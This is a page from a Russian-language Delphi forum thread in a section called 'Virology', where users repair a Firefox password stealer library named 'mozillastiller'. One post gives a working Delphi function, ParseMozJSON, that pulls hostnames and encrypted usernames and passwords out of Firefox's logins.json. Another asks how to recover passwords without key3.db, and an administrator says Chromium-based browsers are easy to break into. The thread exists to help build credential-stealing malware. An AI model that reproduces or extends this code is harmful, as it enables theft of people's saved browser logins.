Среда, 20.09.2017, 03:27 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 2 из 2«12
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Расшифровка паролей Mozilla Firefox 32+
Расшифровка паролей Mozilla Firefox 32+
Arkan0IDДата: Вторник, 02.08.2016, 13:25 | Сообщение # 26
Был не раз
Зарегистрирован: 29.02.2016
Группа: Пользователи
Сообщений: 5
Статус: Offline
Почему перестало работать?
 
Arkan0IDДата: Вторник, 02.08.2016, 13:32 | Сообщение # 27
Был не раз
Зарегистрирован: 29.02.2016
Группа: Пользователи
Сообщений: 5
Статус: Offline
Вот
Прикрепления: 8485501.png(53Kb)
 
Arkan0IDДата: Вторник, 02.08.2016, 13:33 | Сообщение # 28
Был не раз
Зарегистрирован: 29.02.2016
Группа: Пользователи
Сообщений: 5
Статус: Offline
.
Прикрепления: 9003551.jpg(24Kb)
 
dolphinДата: Пятница, 05.08.2016, 22:53 | Сообщение # 29
Администратор
Сообщений: 902
Статус: Offline
Arkan0ID, Мозила разве не хромовском движке? Хромоподобные браузеры вскрываются на раз-два сейчас.

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
Arkan0IDДата: Понедельник, 08.08.2016, 23:17 | Сообщение # 30
Был не раз
Зарегистрирован: 29.02.2016
Группа: Пользователи
Сообщений: 5
Статус: Offline
Нет не на хромовском
 
Arkan0IDДата: Понедельник, 08.08.2016, 23:41 | Сообщение # 31
Был не раз
Зарегистрирован: 29.02.2016
Группа: Пользователи
Сообщений: 5
Статус: Offline
Уважаемые, я починил. В библиотеке mozillastiller замените процедуру ParseMozJSON на
Код

function ParseMozJSON(j: string): string;
var
data, it, ress: string;
begin
data:=GetFile(j);
data:=Pars(',"logins":[{',data,'}],"disabledHosts":[');
while pos(',"hostname":"', data)<> 0 do
  begin
   it:= Pars(',"hostname":"', data, 'timesUsed":');
   ress:=ress + copy(it, 1, pos('","',it)-1);
   delete(it, 0, pos('encryptedUsername":"', it));
   ress:=ress + '<|>'+Pars('encryptedUsername":"',it,'","');
   delete(it, 0, pos('encryptedPassword":"', it));
   ress:=ress + '<|>'+Pars('encryptedPassword":"',it,'","')+#13#10;
   delete(data, 1, pos('timesUsed":',data));
end;
result:=ress;
end;
 
soxosiciДата: Понедельник, 05.09.2016, 16:23 | Сообщение # 32
Новичок
Зарегистрирован: 05.09.2016
Группа: Пользователи
Сообщений: 1
Статус: Offline
Ребята, подскажите, плиз! Можно ли восстановить пароли из logins.json, если файла key3.db нет?
Заранее спасибо.
 
delfcode » Delphi » Вирусология Delphi » Расшифровка паролей Mozilla Firefox 32+
Страница 2 из 2«12
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz